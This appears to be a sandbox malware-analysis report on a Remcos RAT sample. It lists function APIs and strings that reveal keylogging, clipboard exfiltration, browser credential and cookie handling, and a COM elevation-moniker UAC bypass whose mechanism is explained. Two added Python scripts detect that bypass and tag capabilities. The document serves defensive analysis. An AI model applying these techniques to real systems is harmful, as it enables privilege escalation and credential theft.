                                                                                                                              • Instruction ID: 542b70a33e80e6e0f89981d8dea1e9436d18c1c0894ce755b80d2b39ac1ff237
                                                                                                                              • Opcode Fuzzy Hash: 08aa0d3519c40bf520cda46f37196d286b8272779d05665b6af6c38879ff49ce
                                                                                                                              • Instruction Fuzzy Hash: FB91C4B1E45204BFE710BF38EC55A2E3BA9EF84648F00142DF54796291FE79BC448B69
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 04672106
                                                                                                                                • Part of subcall function 04673877: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 04673885
                                                                                                                                • Part of subcall function 04673877: RegSetValueExA.KERNEL32(?,000000AF,00000000,00000004,00000001,00000004,?,?,?,0466C152,046C6C48,00000001,000000AF,Function_000660A4), ref: 046738A0
                                                                                                                                • Part of subcall function 04673877: RegCloseKey.ADVAPI32(?,?,?,?,0466C152,046C6C48,00000001,000000AF,Function_000660A4), ref: 046738AB
                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 04672146
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 04672155
                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,046727EE,00000000,00000000,00000000), ref: 046721AB
                                                                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0467241A
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                                                                              • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                                                                                              • API String ID: 3018269243-13974260
                                                                                                                              • Opcode ID: 1d6023bbefe89f8b968c0f5f1ef434e1caf62ed847f208dd4ec090761562165e
                                                                                                                              • Instruction ID: 0f3db63fe0845385c8c2de785feb3b00745333ff65c8ca0e7ab3bcc63b6e4554
                                                                                                                              • Opcode Fuzzy Hash: 1d6023bbefe89f8b968c0f5f1ef434e1caf62ed847f208dd4ec090761562165e
                                                                                                                              • Instruction Fuzzy Hash: EE7190316043005BE714FB70D8659BEB3E4EFA5618F40096DF54792190FF34BA09CAEA
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0466BBAF
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0466BBC9
                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0466BCEC
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0466BD12
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Find$CloseFile$FirstNext
                                                                                                                              • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                                              • API String ID: 1164774033-3681987949
                                                                                                                              • Opcode ID: e6a073d1a50112cff3166cf9d49a9d08aa99a616b55926e8d828b74895f31a46
                                                                                                                              • Instruction ID: 9e230bcc889342613ce0588826c4991ba9fb3a76f4cda44b9b3ce011265ca442
                                                                                                                              • Opcode Fuzzy Hash: e6a073d1a50112cff3166cf9d49a9d08aa99a616b55926e8d828b74895f31a46
                                                                                                                              • Instruction Fuzzy Hash: 6E513871D10119ABEB18FBB0DC59DEDB778AF11608F00056EE407A2190FF707A8ACA99
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0466BDAF
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0466BDC9
                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0466BE89
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0466BEAF
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0466BED0
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Find$Close$File$FirstNext
                                                                                                                              • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                              • API String ID: 3527384056-432212279
                                                                                                                              • Opcode ID: dd539ccc618e1120149c21539ecc8d3ca13d0565a6a5e051beaa31ca91a73fe9
                                                                                                                              • Instruction ID: ed20b96c144e7867a4e210a69f5e85bab74db0a89b909a1fbbfc4c16e9aa16cb
                                                                                                                              • Opcode Fuzzy Hash: dd539ccc618e1120149c21539ecc8d3ca13d0565a6a5e051beaa31ca91a73fe9
                                                                                                                              • Instruction Fuzzy Hash: 29416C31D00229ABEB14FBB4DC59CFDB7A8EF15614F40016DE507A6180FF347A8ACA99
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • OpenClipboard.USER32 ref: 046768C2
                                                                                                                              • EmptyClipboard.USER32 ref: 046768D0
                                                                                                                              • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 046768F0
                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 046768F9
                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0467692F
                                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 04676938
                                                                                                                              • CloseClipboard.USER32 ref: 04676955
                                                                                                                              • OpenClipboard.USER32 ref: 0467695C
                                                                                                                              • GetClipboardData.USER32(0000000D), ref: 0467696C
                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 04676975
                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0467697E
                                                                                                                              • CloseClipboard.USER32 ref: 04676984
                                                                                                                                • Part of subcall function 04664AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 04664B36
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3520204547-0
                                                                                                                              • Opcode ID: c9423907a98468b84f13dd7273162dd161f52cd6120c99c5087be7c742bc42ca
                                                                                                                              • Instruction ID: 5291e3624ad1a2cb6ccc39644a2ac61290a0329732d02c0841db4413e4be937c
                                                                                                                              • Opcode Fuzzy Hash: c9423907a98468b84f13dd7273162dd161f52cd6120c99c5087be7c742bc42ca
                                                                                                                              • Instruction Fuzzy Hash: 512153B16043006FE714BBB0D85CABE76A9EF96705F40181DF607822D1FF38AD49C6A6
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0$1$2$3$4$5$6$7
                                                                                                                              • API String ID: 0-3177665633
                                                                                                                              • Opcode ID: 53484ed0c5329754cd10a7c3924f2fff045a5ff441f8676b70165cad40169c1c
                                                                                                                              • Instruction ID: 76579c114e339653d9c8b3472e2d876ab9553e157c18805a573afe5712a5eea1
                                                                                                                              • Opcode Fuzzy Hash: 53484ed0c5329754cd10a7c3924f2fff045a5ff441f8676b70165cad40169c1c
                                                                                                                              • Instruction Fuzzy Hash: 05718DB0548341AFF304EF20E891BAABBD49F95314F04491DE593572E0FA74BA4ECB96
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • _wcslen.LIBCMT ref: 04667521
                                                                                                                              • CoGetObject.OLE32(?,00000024,046C6518,00000000), ref: 04667582
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Object_wcslen
                                                                                                                              • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                                              • API String ID: 240030777-3166923314
                                                                                                                              • Opcode ID: e581e28d688b11b498ec0b59751de2faf2f6f5e48e231d4af6431663e32e8ce3
                                                                                                                              • Instruction ID: f53245dac4908142125d4a571eee7bc8cf4b8abf6d3e806351708a374f5aa87c
                                                                                                                              • Opcode Fuzzy Hash: e581e28d688b11b498ec0b59751de2faf2f6f5e48e231d4af6431663e32e8ce3
                                                                                                                              • Instruction Fuzzy Hash: 9411AC71950214ABEB10EB94D858DDDB7BCDB54719F14005EE909F3200F674BE458AF9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%
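The function above builds the COM elevation moniker Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} and passes it to CoGetObject. That CLSID is the CMSTPLUA class (ICMLuaUtil), an auto-elevated COM server, and the ucm-prefixed name in the [+] ucmAllocateElevatedObject string matches the helper routine of the public UACMe project, so this is a lifted UAC bypass rather than Remcos-specific code. The elevation request is only honoured for a caller the UAC service already trusts, which is why the code runs from inside colorcpl.exe (the process this memory dump was taken from, a Microsoft-signed System32 binary the sample injected into). The following Python check is an added example and is not part of the Joe Sandbox report or of the sample: it flags the process-tree artefact of this technique over Sysmon-style process-creation events. It relies on publicly documented behaviour that the report itself does not show, namely that the elevated object is hosted by a high-integrity dllhost.exe /Processid:{3E5FC7F9-...} surrogate and that anything launched through ICMLuaUtil appears as that surrogate's child. The field names (pid, ppid, image, cmdline, integrity) and the sample events are constructed.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# CLSID taken from the sample's own strings: CMSTPLUA / ICMLuaUtil.
CMSTPLUA_CLSID = "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"

# The moniker prefix and the CLSID are separate strings in the binary and are
# concatenated at runtime; this matches the joined form.
MONIKER_RE = re.compile(r"Elevation:Administrator!new:(\{[0-9A-Fa-f-]{36}\})")
# Command line of the COM surrogate that hosts an out-of-process elevated object
# (assumption: public documentation of the technique, not shown in this report).
SURROGATE_RE = re.compile(r"/Processid:(\{[0-9A-Fa-f-]{36}\})", re.IGNORECASE)


def parse_elevation_moniker(s: str) -> Optional[str]:
    """Return the upper-cased CLSID named by a COM elevation moniker, or None."""
    m = MONIKER_RE.search(s)
    return m.group(1).upper() if m else None


@dataclass(frozen=True)
class ProcEvent:
    """Subset of a Sysmon Event ID 1 record (field names are an assumption)."""
    pid: int
    ppid: int
    image: str
    cmdline: str
    integrity: str  # "Low", "Medium", "High" or "System"


def find_cmstplua_surrogate_children(events: List[ProcEvent]) -> List[Tuple[ProcEvent, ProcEvent]]:
    """Return (surrogate, child) pairs where a high-integrity dllhost.exe hosting
    the CMSTPLUA class spawned another process. Legitimate use of this class
    (cmstp.exe profile installation) normally spawns nothing, so any child is
    worth an alert."""
    surrogates = {}
    for e in events:
        if not e.image.lower().endswith("\\dllhost.exe"):
            continue
        m = SURROGATE_RE.search(e.cmdline)
        if m and m.group(1).upper() == CMSTPLUA_CLSID and e.integrity.lower() in ("high", "system"):
            surrogates[e.pid] = e
    return [(surrogates[e.ppid], e) for e in events if e.ppid in surrogates]


# Constructed sample events: the medium-integrity injected host, the elevated
# surrogate it requested, the payload launched through it, and a benign
# surrogate for an unrelated (placeholder) CLSID.
SAMPLE_EVENTS = [
    ProcEvent(5, 4, r"C:\Windows\System32\colorcpl.exe", "colorcpl.exe", "Medium"),
    ProcEvent(900, 700, r"C:\Windows\System32\dllhost.exe",
              r"C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}", "High"),
    ProcEvent(950, 900, r"C:\Windows\System32\cmd.exe", "cmd.exe", "High"),
    ProcEvent(910, 700, r"C:\Windows\System32\dllhost.exe",
              r"C:\Windows\system32\DllHost.exe /Processid:{11111111-2222-3333-4444-555555555555}", "Medium"),
]

if __name__ == "__main__":
    for surrogate, child in find_cmstplua_surrogate_children(SAMPLE_EVENTS):
        print(f"CMSTPLUA surrogate pid={surrogate.pid} spawned pid={child.pid} {child.image} ({child.integrity})")
```

The integrity-level condition matters: the same dllhost.exe command line also appears at medium integrity when the class is instantiated without the elevation moniker, and that is not a bypass.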

                                                                                                                              APIs
                                                                                                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,046D58E8), ref: 0467A75E
                                                                                                                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0467A7AD
                                                                                                                              • GetLastError.KERNEL32 ref: 0467A7BB
                                                                                                                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0467A7F3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3587775597-0
                                                                                                                              • Opcode ID: 44491514939347f1e3da6ca8b19201c3d21ba329dacc510b7879bdf102eb9092
                                                                                                                              • Instruction ID: a96dc95b2e64d6d2d85ea5a4430a363ef15777f7e5a2f9e4f7ed9f4fc105a3a3
                                                                                                                              • Opcode Fuzzy Hash: 44491514939347f1e3da6ca8b19201c3d21ba329dacc510b7879bdf102eb9092
                                                                                                                              • Instruction Fuzzy Hash: 0D813671108300ABE314EB60D8949AFB7E8FF95719F50491EF58682250FF70FA49CB9A
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0466C39B
                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0466C46E
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0466C47D
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0466C4A8
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Find$CloseFile$FirstNext
                                                                                                                              • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                              • API String ID: 1164774033-405221262
                                                                                                                              • Opcode ID: eb5b271f1e89706303eb25b821bcd71881d020eca55b6e0144637ed0dfaa4221
                                                                                                                              • Instruction ID: b1e2e6ee4ca6c13343a79da0ff6f037cb582396f4990f2516056ff0da8c44878
                                                                                                                              • Opcode Fuzzy Hash: eb5b271f1e89706303eb25b821bcd71881d020eca55b6e0144637ed0dfaa4221
                                                                                                                              • Instruction Fuzzy Hash: F33140719043195BEB14F7A1DC98DFDB7B8AF11719F00015DA407A2194FF74BA8ACA9C
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,046D52D8,046D52F0,00000001), ref: 0467C2EC
                                                                                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,046D52D8,046D52F0,00000001), ref: 0467C31C
                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,046D52D8,046D52F0,00000001), ref: 0467C38E
                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,046D52D8,046D52F0,00000001), ref: 0467C39B
                                                                                                                                • Part of subcall function 0467C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,046D52D8,046D52F0,00000001), ref: 0467C371
                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,046D52D8,046D52F0,00000001), ref: 0467C3BC
                                                                                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,046D52D8,046D52F0,00000001), ref: 0467C3D2
                                                                                                                              • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,046D52D8,046D52F0,00000001), ref: 0467C3D9
                                                                                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,046D52D8,046D52F0,00000001), ref: 0467C3E2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2341273852-0
                                                                                                                              • Opcode ID: f89c781afc4c212a5966aaf7903600df415e1cb85004b2b46011e0db35c5e46c
                                                                                                                              • Instruction ID: 9d07119c9791597f409e24c2ba3a34cdf2252f46454348fe76bc392a30873341
                                                                                                                              • Opcode Fuzzy Hash: f89c781afc4c212a5966aaf7903600df415e1cb85004b2b46011e0db35c5e46c
                                                                                                                              • Instruction Fuzzy Hash: A931727290121C9AEF34EAA0DC48EDA77BCEF04314F4405A9E655E2140FF75BEC88BA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • GetForegroundWindow.USER32 ref: 0466A416
                                                                                                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 0466A422
                                                                                                                              • GetKeyboardLayout.USER32(00000000), ref: 0466A429
                                                                                                                              • GetKeyState.USER32(00000010), ref: 0466A433
                                                                                                                              • GetKeyboardState.USER32(?), ref: 0466A43E
                                                                                                                              • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0466A461
                                                                                                                              • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0466A4C1
                                                                                                                              • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0466A4FA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1888522110-0
                                                                                                                              • Opcode ID: 133b279c1a205e0e5ba619534724ac14d53a41c9411383ab0b78c8b9e9983e89
                                                                                                                              • Instruction ID: 99fe3b2f2e587ee458a2610c32415d0150a2c33ec85ae6d1451fafceb8dbc839
                                                                                                                              • Opcode Fuzzy Hash: 133b279c1a205e0e5ba619534724ac14d53a41c9411383ab0b78c8b9e9983e89
                                                                                                                              • Instruction Fuzzy Hash: A4313D72604308BFD710DB94DC44F9BB7ECEB88744F00082AF646D61A0F6B5A9588BA2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0467409D
                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 046740A9
                                                                                                                                • Part of subcall function 04664AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 04664B36
                                                                                                                              • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 0467426A
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 04674271
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                                              • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                                              • API String ID: 2127411465-314212984
                                                                                                                              • Opcode ID: 81f2e078532671681f0b8d36134ee99b42b5af107e680139c46d8ffd6a2961e4
                                                                                                                              • Instruction ID: 280814378387faff4a6046e1936a0f94b551994c474d7f15bc0cfe87316ba27f
                                                                                                                              • Opcode Fuzzy Hash: 81f2e078532671681f0b8d36134ee99b42b5af107e680139c46d8ffd6a2961e4
                                                                                                                              • Instruction Fuzzy Hash: 9EB1F572A0430067EB18FB75DC698FF76A89F92658F40091CE907971D1FE24FA48C6DA
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%
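Taken together, the function listings above are the evidence behind several of the signatures in the report header: the clipboard read whose subcall ends in send over WS2_32, the CoGetObject elevation moniker, the \Mozilla\Firefox\Profiles\ search for cookies.sqlite, the GetForegroundWindow / GetKeyboardState / ToUnicodeEx loop that translates scan codes into characters under the active keyboard layout, and the RegCreateKeyExW block that resolves SHDeleteKeyW from Shlwapi.dll at runtime. The following script is an added example and is not part of the Joe Sandbox report or of the sample: a small Python triage helper that parses this listing format (the bulleted "APIs" lines, including "Part of subcall function" entries, and the "String ID" field whose strings are joined with "$") and tags each function with a capability when its API set and strings match. The capability rules and their names are the editor's own assumptions; the embedded excerpt is a constructed, trimmed copy of lines from this page.

```python
import re
from typing import Dict, List

# Constructed excerpt in the report's own listing format (trimmed copy of lines above).
REPORT_EXCERPT = r"""
APIs
• OpenClipboard.USER32 ref: 046768C2
• SetClipboardData.USER32(0000000D,00000000), ref: 04676938
• GetClipboardData.USER32(0000000D), ref: 0467696C
  • Part of subcall function 04664AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 04664B36
• String ID:
Uniqueness Score: -1.00%
APIs
• _wcslen.LIBCMT ref: 04667521
• CoGetObject.OLE32(?,00000024,046C6518,00000000), ref: 04667582
• String ID: $$Elevation:Administrator!new:$[+] CoGetObject${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
Uniqueness Score: -1.00%
APIs
• FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0466C39B
• String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
Uniqueness Score: -1.00%
APIs
• GetForegroundWindow.USER32 ref: 0466A416
• GetKeyboardState.USER32(?), ref: 0466A43E
• ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0466A461
• String ID:
Uniqueness Score: -1.00%
APIs
• RegCreateKeyExW.ADVAPI32(00000000,?), ref: 0467409D
• LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 0467426A
• GetProcAddress.KERNEL32(00000000), ref: 04674271
• String ID: SHDeleteKeyW$Shlwapi.dll
Uniqueness Score: -1.00%
"""

# "• Name.MODULE(...)" or "• Part of subcall function XXXXXXXX: Name.MODULE(...)"
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?([A-Za-z_][A-Za-z0-9_]*)\.[A-Z0-9_]+\b")
# "• String ID: a$b$c" (strings joined with "$"; empty when the function has none)
STRING_LINE = re.compile(r"^\s*•\s*String ID:\s*(.*)$")


def parse_function_blocks(text: str) -> List[Dict]:
    """Split a listing into one dict per function: {'apis': set, 'strings': list}."""
    blocks: List[Dict] = []
    cur = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = {"apis": set(), "strings": []}
            blocks.append(cur)
            continue
        if cur is None:
            continue
        m = API_LINE.match(line)
        if m:
            cur["apis"].add(m.group(1))
            continue
        m = STRING_LINE.match(line)
        if m:
            cur["strings"] = [s for s in m.group(1).split("$") if s]
    return blocks


# (capability name, APIs that must all be present, substrings of which one must appear)
# Rule names and thresholds are the editor's assumptions, not Joe Sandbox signatures.
CAPABILITY_RULES = [
    ("clipboard data sent to C2", {"GetClipboardData", "send"}, ()),
    ("COM elevation moniker (UAC bypass)", {"CoGetObject"}, ("Elevation:Administrator!new:",)),
    ("Firefox cookie database access", {"FindFirstFileW"}, ("cookies.sqlite",)),
    ("keystroke capture", {"GetKeyboardState", "ToUnicodeEx"}, ()),
    ("registry key deletion via SHDeleteKeyW", {"GetProcAddress"}, ("SHDeleteKeyW",)),
]


def classify(block: Dict) -> List[str]:
    """Return the capability names whose API and string conditions the block satisfies."""
    found = []
    for name, apis, substrs in CAPABILITY_RULES:
        if not apis <= block["apis"]:
            continue
        if substrs and not any(sub in s for s in block["strings"] for sub in substrs):
            continue
        found.append(name)
    return found


def triage(text: str) -> List[List[str]]:
    """One capability list per function block, in listing order."""
    return [classify(b) for b in parse_function_blocks(text)]


if __name__ == "__main__":
    for i, caps in enumerate(triage(REPORT_EXCERPT), 1):
        print(f"function {i}: {', '.join(caps) or '(no rule matched)'}")
```

The parser keys on the API name before the module suffix, so it also picks up CRT wrappers such as _wcslen and subcall entries such as send, which is what links the clipboard reader to network output; pasting the full listing from this report into REPORT_EXCERPT produces one entry per function, with most CRT-only functions left untagged.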

                                                                                                                              APIs
                                                                                                                              • _free.LIBCMT ref: 046A9212
                                                                                                                              • _free.LIBCMT ref: 046A9236
                                                                                                                              • _free.LIBCMT ref: 046A93BD
                                                                                                                              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,046BF234), ref: 046A93CF
                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,046D2764,000000FF,00000000,0000003F,00000000,?,?), ref: 046A9447
                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,046D27B8,000000FF,?,0000003F,00000000,?), ref: 046A9474
                                                                                                                              • _free.LIBCMT ref: 046A9589
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 314583886-0
                                                                                                                              • Opcode ID: e365384ad6ce7c955b092a8ba979c998a22d4ae217e4c046bd6e219ae4cddf6d
                                                                                                                              • Instruction ID: caca42c1b2787bea5948d2768a63c5c8936dcc3de768470f9b7a65527b7359ce
                                                                                                                              • Opcode Fuzzy Hash: e365384ad6ce7c955b092a8ba979c998a22d4ae217e4c046bd6e219ae4cddf6d
                                                                                                                              • Instruction Fuzzy Hash: C3C14AB1A00604AFDB20AF78C840AAABBF8EF56314F24499ED49097381F734BD55CF54
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0466BA4E
                                                                                                                              • GetLastError.KERNEL32 ref: 0466BA58
                                                                                                                              Strings
                                                                                                                              • [Chrome StoredLogins found, cleared!], xrefs: 0466BA7E
                                                                                                                              • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0466BA19
                                                                                                                              • [Chrome StoredLogins not found], xrefs: 0466BA72
                                                                                                                              • UserProfile, xrefs: 0466BA1E
                                                                                                                              Memory Dump Source
